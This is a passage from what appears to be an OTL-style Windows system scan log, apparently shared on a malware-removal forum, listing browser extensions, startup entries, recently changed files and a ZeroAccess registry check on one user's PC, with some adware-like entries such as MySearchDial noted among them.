Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\ CHR - Extension: Norton Identity Protection = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\bejnhdlplbjhffionohbdnpcbobfejcc\2013.4.11.6_0\ CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\ CHR - Extension: YouTube = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\ CHR - Extension: Google Search = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\ CHR - Extension: Google Wallet = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\ CHR - Extension: 20-20 3D Viewer for IKEA = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfhldcakmgpmglboaclpfdedehjblalp\5.0.94.1_0\ CHR - Extension: MySearchDial = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff\9.4.24_0\ CHR - Extension: Gmail = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\ O1 HOSTS File: ([2013-08-22 15:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts O2:[b]64bit:[/b] - BHO: (Lync Browser Helper) - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation) O2:[b]64bit:[/b] - BHO: (Easy Photo Print) - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\EPSON Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION) O2:[b]64bit:[/b] - BHO: (Microsoft SkyDrive Pro Browser Helper) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation) O2 - BHO: (E-Web Print) - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\EPSON Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION) O2 - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coieplg.dll (Symantec Corporation) O2 - BHO: (Norton Vulnerability Protection) - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ips\ipsbho.dll (Symantec Corporation) O2 - BHO: (IplexToALLPlayer) - {DF925EF3-7A87-44E4-9CAF-8D7B280BF616} - C:\Program Files (x86)\ALLPlayer\Iplex\IplexToALLPlayer.dll (ALLCinema Ltd.) O3:[b]64bit:[/b] - HKLM\..\Toolbar: (Easy Photo Print) - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\EPSON Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION) O3 - HKLM\..\Toolbar: (E-Web Print) - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files (x86)\EPSON Software\E-Web Print\ewps_tb.dll (SEIKO EPSON CORPORATION) O4:[b]64bit:[/b] - HKLM..\Run: [BTMTrayAgent] C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll (Motorola Solutions, Inc.) O4:[b]64bit:[/b] - HKLM..\Run: [CDAServer] C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe () O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\WINDOWS\SysNative\hkcmd.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [IAStorIcon] C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\WINDOWS\SysNative\igfxtray.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [Net iD] C:\Program Files\Net iD\iid.exe (SecMaker AB) O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\WINDOWS\SysNative\igfxpers.exe (Intel Corporation) O4:[b]64bit:[/b] - HKLM..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) O4 - HKLM..\Run: [Adobe Reader Speed Launcher] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe (Adobe Systems Incorporated) O4 - HKLM..\Run: [Bonus.SSR.FR12] C:\Program Files (x86)\ABBYY FineReader 12\Bonus.ScreenshotReader.exe (ABBYY Production LLC.) O4 - HKLM..\Run: [EEventManager] C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION) O4 - HKLM..\Run: [fst_se_47] File not found O4 - HKLM..\Run: [Intel AppUp(SM) center] C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe (Intel Corporation) O4 - HKLM..\Run: [Net iD] C:\Program Files (x86)\Net iD\iid.exe (SecMaker AB) O4 - HKLM..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe (Symantec Corporation) O4 - HKLM..\Run: [RemoteControl10] C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe (CyberLink Corp.) O4 - HKLM..\Run: [StartCCC] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe (Advanced Micro Devices, Inc.) O4 - HKU\S-1-5-21-4279228227-215742994-1318027649-1001..\Run: [ALLUpdate] C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe (ALLPlayer Group Ltd.) O4 - HKU\S-1-5-21-4279228227-215742994-1318027649-1001..\Run: [EPLTarget\P0000000000000000] C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATILEE.EXE /EPT "EPLTarget\P0000000000000000" /M "XP-412 413 415 Series" File not found O4 - HKU\S-1-5-21-4279228227-215742994-1318027649-1001..\Run: [EPLTarget\P0000000000000001] C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATILEE.EXE /EPT "EPLTarget\P0000000000000001" /M "XP-412 413 415 Series" File not found O4 - HKU\S-1-5-21-4279228227-215742994-1318027649-1001..\Run: [uTorrent] C:\Users\Edyta\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3 O9:[b]64bit:[/b] - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIE.dll (Microsoft Corporation) O9:[b]64bit:[/b] - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIE.dll (Microsoft Corporation) O9:[b]64bit:[/b] - Extra Button: Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation) O9:[b]64bit:[/b] - Extra 'Tools' menuitem : Lync Click to Call - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation) O9:[b]64bit:[/b] - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll (Microsoft Corporation) O9:[b]64bit:[/b] - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll (Microsoft Corporation) O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIE.dll (Microsoft Corporation) O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIE.dll (Microsoft Corporation) O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll (Microsoft Corporation) O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll (Microsoft Corporation) O13[b]64bit:[/b] - gopher Prefix: missing O13 - gopher Prefix: missing O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A5792CA6-4358-4FA7-8141-6A17491FD6EC}: DhcpNameServer = 192.168.1.254 O18:[b]64bit:[/b] - Protocol\Handler\ms-help - No CLSID value found O18:[b]64bit:[/b] - Protocol\Handler\osf - No CLSID value found O18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value found O18 - Protocol\Handler\osf {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\office15\MSOSB.DLL (Microsoft Corporation) O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation) O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation) O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\WINDOWS\SysNative\igfxdev.dll (Intel Corporation) O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. O30 - LSA: Security Packages - (livessp) - File not found O32 - HKLM CDRom: AutoRun - 1 O34 - HKLM BootExecute: (autocheck autochk *) O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %* O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %* O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %* O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2014-09-10 17:44:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\topBuyyer [2014-09-10 14:27:24 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\MshtmlDac.dll [2014-09-10 14:27:24 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\MshtmlDac.dll [2014-09-10 14:27:23 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll [2014-09-10 14:27:23 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\mshtmled.dll [2014-09-10 14:27:22 | 000,758,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9diag.dll [2014-09-10 14:27:22 | 000,072,704 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\JavaScriptCollectionAgent.dll [2014-09-10 14:27:21 | 000,547,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll [2014-09-10 14:27:18 | 000,446,464 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\dxtmsft.dll [2014-09-10 14:27:18 | 000,289,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\dxtrans.dll [2014-09-10 14:27:17 | 000,727,040 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll [2014-09-10 14:27:17 | 000,707,072 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe [2014-09-10 14:27:15 | 000,775,168 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll [2014-09-10 14:27:15 | 000,678,400 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll [2014-09-10 14:27:15 | 000,597,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript9diag.dll [2014-09-10 14:27:15 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\JavaScriptCollectionAgent.dll [2014-09-10 14:27:09 | 002,014,208 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\inetcpl.cpl [2014-09-10 14:27:08 | 002,104,832 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\inetcpl.cpl [2014-09-10 14:27:06 | 005,833,728 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll [2014-09-10 10:41:04 | 000,875,688 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msvcr120_clr0400.dll [2014-09-10 10:41:04 | 000,869,544 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msvcr120_clr0400.dll [2014-09-09 21:27:33 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome [2014-09-09 20:42:03 | 010,036,224 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerInstaller.exe [2014-08-31 21:33:12 | 000,000,000 | ---D | C] -- C:\Users\Edyta\AppData\Local\Adobe [2014-08-14 20:17:35 | 000,918,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\MrmCoreR.dll [2014-08-14 20:16:37 | 001,273,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\rpcrt4.dll [2014-08-14 20:16:36 | 000,517,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\dxgi.dll [2014-08-14 20:16:35 | 002,133,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\dwmcore.dll [2014-08-14 20:12:55 | 003,118,080 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\Wpc.dll [2014-08-14 20:12:55 | 003,048,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WpcMon.exe [2014-08-14 20:12:55 | 002,861,056 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WpcWebSync.dll [2014-08-14 20:12:55 | 002,344,448 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\Wpc.dll [2014-08-14 20:12:52 | 000,035,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\TsWpfWrp.exe [2014-08-14 20:12:52 | 000,035,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\TsWpfWrp.exe [2014-08-14 20:12:34 | 001,336,624 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\gdi32.dll [2014-08-14 20:12:33 | 000,623,616 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\MDMAgent.exe [2014-08-14 20:12:32 | 002,790,912 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msi.dll [2014-08-14 20:12:32 | 002,642,944 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\authui.dll [2014-08-14 20:12:32 | 002,318,336 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\authui.dll [2014-08-14 20:12:31 | 000,356,352 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msihnd.dll [2014-08-14 20:12:31 | 000,281,088 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msihnd.dll [2014-08-14 20:12:31 | 000,114,520 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\consent.exe [2012-11-14 00:56:43 | 002,258,432 | ---- | C] (Samsung Electronics) -- C:\ProgramData\MakeMarkerFile.exe [85 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ] [2 C:\Users\Edyta\Desktop\*.tmp files -> C:\Users\Edyta\Desktop\*.tmp -> ] [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2014-09-10 18:40:00 | 000,000,830 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job [2014-09-10 18:31:57 | 000,002,209 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk [2014-09-10 18:31:00 | 000,001,060 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job [2014-09-10 18:29:50 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat [2014-09-10 18:28:18 | 000,001,056 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job [2014-09-10 18:27:47 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys [2014-09-10 18:27:43 | 2481,012,735 | -HS- | M] () -- C:\hiberfil.sys [2014-09-10 18:26:00 | 000,000,933 | ---- | M] () -- C:\WINDOWS\tasks\EPSON XP-412 413 415 Series Update {F5252391-E7D6-400D-9F68-312CB03EA866}.job [2014-09-10 18:26:00 | 000,000,747 | ---- | M] () -- C:\WINDOWS\tasks\EPSON XP-412 413 415 Series Invitation {F5252391-E7D6-400D-9F68-312CB03EA866}.job [2014-09-10 18:09:17 | 000,865,408 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI [2014-09-10 18:09:17 | 000,723,514 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat [2014-09-10 18:09:17 | 000,136,128 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat [2014-09-10 18:05:00 | 000,000,933 | ---- | M] () -- C:\WINDOWS\tasks\EPSON XP-412 413 415 Series Update {9FDDB6CE-31CA-483D-8797-DA0436368E4F}.job [2014-09-10 18:05:00 | 000,000,747 | ---- | M] () -- C:\WINDOWS\tasks\EPSON XP-412 413 415 Series Invitation {9FDDB6CE-31CA-483D-8797-DA0436368E4F}.job [2014-09-10 17:23:00 | 000,000,358 | ---- | M] () -- C:\WINDOWS\tasks\bench-sys.job [2014-09-10 14:28:03 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msrating.dll [2014-09-10 14:27:51 | 000,111,616 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieetwcollector.exe [2014-09-10 14:27:51 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieetwproxystub.dll [2014-09-10 14:27:51 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieetwproxystub.dll [2014-09-10 14:27:51 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieetwcollectorres.dll [2014-09-10 14:27:50 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieUnatt.exe [2014-09-10 14:27:49 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieUnatt.exe [2014-09-10 14:27:48 | 000,066,048 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\iesetup.dll [2014-09-10 14:27:48 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\iesetup.dll [2014-09-10 14:27:48 | 000,033,792 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\iernonce.dll [2014-09-10 14:27:48 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\iernonce.dll [2014-09-10 14:27:45 | 000,195,584 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msrating.dll [2014-09-09 21:45:18 | 948,915,144 | ---- | M] () -- C:\WINDOWS\MEMORY.DMP [2014-09-09 20:42:13 | 010,036,224 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerInstaller.exe [2014-09-02 22:06:15 | 000,706,016 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe [2014-09-02 22:06:15 | 000,105,440 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl [2014-08-31 21:27:40 | 000,537,392 | ---- | M] () -- C:\WINDOWS\SysNative\FNTCACHE.DAT [2014-08-16 04:00:16 | 005,833,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll [2014-08-16 03:56:06 | 000,547,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll [2014-08-16 03:54:40 | 000,083,968 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\MshtmlDac.dll [2014-08-16 03:43:34 | 000,758,272 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9diag.dll [2014-08-16 03:32:08 | 000,446,464 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\dxtmsft.dll [2014-08-16 03:25:28 | 000,072,704 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\JavaScriptCollectionAgent.dll [2014-08-16 03:20:18 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\MshtmlDac.dll [2014-08-16 03:19:22 | 000,085,504 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll [2014-08-16 03:18:16 | 000,289,280 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\dxtrans.dll [2014-08-16 03:11:26 | 000,597,504 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript9diag.dll [2014-08-16 03:05:57 | 000,727,040 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll [2014-08-16 03:05:44 | 000,707,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe [2014-08-16 03:03:45 | 002,104,832 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\inetcpl.cpl [2014-08-16 02:58:45 | 000,060,416 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\JavaScriptCollectionAgent.dll [2014-08-16 02:53:54 | 000,069,632 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\mshtmled.dll [2014-08-16 02:44:59 | 002,014,208 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\inetcpl.cpl [2014-08-16 02:18:36 | 000,775,168 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll [2014-08-16 02:12:36 | 000,678,400 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll [85 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ] [2 C:\Users\Edyta\Desktop\*.tmp files -> C:\Users\Edyta\Desktop\*.tmp -> ] [color=#E56717]========== Files Created - No Company Name ==========[/color] [2014-09-09 21:27:30 | 000,002,209 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk [2014-07-11 22:25:03 | 000,872,506 | ---- | C] () -- C:\WINDOWS\SysWow64\PerfStringBackup.INI [2014-07-11 22:14:55 | 000,123,392 | ---- | C] () -- C:\WINDOWS\SysWow64\amdhdl32.dll [2014-05-19 08:30:46 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol [2014-03-18 17:27:42 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini [2014-03-18 17:27:21 | 000,103,936 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll [2013-12-13 10:23:56 | 000,204,952 | ---- | C] () -- C:\WINDOWS\SysWow64\ativvsvl.dat [2013-12-13 10:23:54 | 000,157,144 | ---- | C] () -- C:\WINDOWS\SysWow64\ativvsva.dat [2013-12-13 10:23:46 | 000,003,917 | ---- | C] () -- C:\WINDOWS\SysWow64\atipblag.dat [2013-12-13 10:23:24 | 000,995,342 | ---- | C] () -- C:\WINDOWS\SysWow64\amdocl_as32.exe [2013-12-13 10:23:24 | 000,798,734 | ---- | C] () -- C:\WINDOWS\SysWow64\amdocl_ld32.exe [2013-11-29 00:50:44 | 000,280,064 | ---- | C] () -- C:\WINDOWS\SysWow64\igdmd32.dll [2013-11-29 00:50:38 | 000,182,272 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll [2013-11-29 00:50:36 | 000,142,848 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll [2013-08-30 19:53:48 | 000,038,912 | ---- | C] () -- C:\WINDOWS\SysWow64\kdbsdk32.dll [2013-08-22 17:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat [2013-08-22 17:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT [2013-08-22 16:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat [2013-08-22 09:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin [2013-08-22 05:32:36 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll [2013-08-22 01:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll [2013-08-22 01:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat [2013-06-21 21:15:49 | 000,423,709 | ---- | C] () -- C:\Users\Edyta\AppData\Local\mysearchdial_speedial_v9.0.2.crx [2013-04-30 20:08:55 | 000,644,608 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll [2013-04-30 20:08:55 | 000,258,048 | ---- | C] () -- C:\WINDOWS\SysWow64\libFLAC.dll [2013-04-07 08:49:32 | 000,000,017 | ---- | C] () -- C:\Users\Edyta\AppData\Local\resmon.resmoncfg [2012-11-14 00:56:43 | 000,003,196 | ---- | C] () -- C:\ProgramData\MakeMarkerFile.xml [2012-11-14 00:55:51 | 000,000,000 | ---- | C] () -- C:\WINDOWS\ativpsrm.bin [2012-11-14 00:55:50 | 000,003,917 | ---- | C] () -- C:\WINDOWS\SysWow64\atipblup.dat [color=#E56717]========== ZeroAccess Check ==========[/color] [2014-07-05 15:40:36 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 "" = C:\Windows\SysNative\shell32.dll -- [2014-05-16 19:51:20 | 021,268,952 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2014-05-16 19:51:20 | 018,755,672 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013-08-22 11:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free 